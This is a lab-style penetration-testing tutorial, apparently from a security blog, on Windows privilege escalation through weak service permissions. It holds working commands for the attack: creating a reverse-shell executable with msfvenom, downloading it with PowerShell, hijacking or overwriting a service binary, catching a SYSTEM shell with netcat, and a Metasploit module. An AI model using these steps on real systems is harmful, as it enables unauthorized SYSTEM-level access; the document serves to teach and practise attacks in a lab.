Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting misconfigured services is one technique to increase privileges.

Table of Content

• MS Windows Services
• Access Rights for the Service Control Manager
• Weak Service Permission Lab Setup
• Abusing Insecure Configuration File Permissions (PTOC)
• Abusing Insecure Service Executable (PTO)
• Metasploit

MS Windows Services

Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.

A system or a user account must be linked to a service for it to function properly. The following built-in system accounts are frequently used to operate services:

• LocalService
• NetworkService
• LocalSystem

Access Rights for the Service Control Manager

The SCM creates a service object’s security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the following access.

 

Weak Service Permission Lab Setup

This article will help to set up a lab that focuses on two Windows weak service Permission misconfigurations that allow an attacker to get administrative privileges:

• Insecure Configuration File Permissions: A low-privileged user can update service settings, such as the service binary that runs when the service starts.
• Insecure Service Executable: When the service starts, a low-privileged user can overwrite the binary it launches.

An Access Control List (ACL) for each service defines the permissions for that service. Some permissions are extremely damaging, such as:

• Command: sc qc <service> – to query the configuration of the service
• Command: sc query <service> – to check the current status of the service
• Command: net start/stop <service> – to start and stop the service
• Command: sc config <service> <option>= <value> – change the configuration of the service

Steps for Weak Services Permissions

Step 1: Run CMD as administrator and execute the below command to create a service with the name of Pentest inside /temp directory

sc.exe create pentest binPath= "C:\temp\service.exe"

Step2: To create a vulnerable service we need to assign some toxic privilege with the help of SubinACL to change the permission of services.

NOTE:

SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.

In this case, we have granted a user permissions to suspend (pause/continue), start and stop (restart) a service. The full list of the available service permissions:

Step3: After Download SubinACL, execute the following command to assign PTOC Permissions user “ignite” against “Pentest” service.

cd C:\Program Files (x86)\Windows Resource Kits\Tools
subinacl.exe /service pentest /grant=msedgewin10\ignite=PTOC

Abusing Insecure Configuration File Permissions (PTOC)

An attacker can escalate privileges by exploiting Service Configuration if the system binaries have the SERVIC_ ALL_ACCESS or SERVICE_CHANGE_CONFIG permissions.

Following an initial foothold, you may use the wmic programme to enumerate system services and query for the service name, startname, and path.

wmic service get name,startname,pathname

The service name shown as pentest exits the c:/temp directory, as shown in the following image. We may verify the service configuration with the following command.

sc qc pentest

The service account type is Localsystem, and it has privileges to start, stop, and pause services, according to the output.

We can identify SERVICE ALL ACCESS or SERVICE CHANGE CONFIG permissions using the accesschk Sysinternals tool since these capabilities allow attackers to change service settings.

accesschk.exe /accepteula –uwcqv ignite pentest

It says that Ignite user has full access to this service

Create an executable shell and install it on the victim’s machine, then modify the service binary path to a malicious executable since the user ignite has full access to the service and therefore has the ability to change the configuration.

msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe >  shell.exe
python –m SimpleHTTPserver 80

Use the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.

cd c:\Users\public
powershell wget http://192.168.1.3/shell.exe -o shell.exe
dir

Because the ignite user has access to edit the service configuration and subsequently start the service, thus we can change the path and point it to our reverse shell payload.

sc config pentest binPath= "C:\Users\Public\shell.exe"
net start pentest

As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system

nc –lvp 8888
whoami

Abusing Insecure Service Executable (PTO)

If the low-privilege user has at least Pause/continue, Start, and Stop permissions for the service, an attacker may attempt to overwrite the system binaries with a malicious executable file in order to escalate privileges.

cd c:\temp
dir
move service.exe service.bak

Use the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.

powershell wget http://192.168.1.3/shell.exe -o service.exe

As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system

nc –lvp 8888
whoami

Metasploit

This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure configuration, file or registry permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload.

use exploit/windows/local/service_permissions
set lhost 192.168.1.3
set session 1
exploit

This will result in a new session as NT AUTHORITY\SYSTEM when this succeeds.

https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here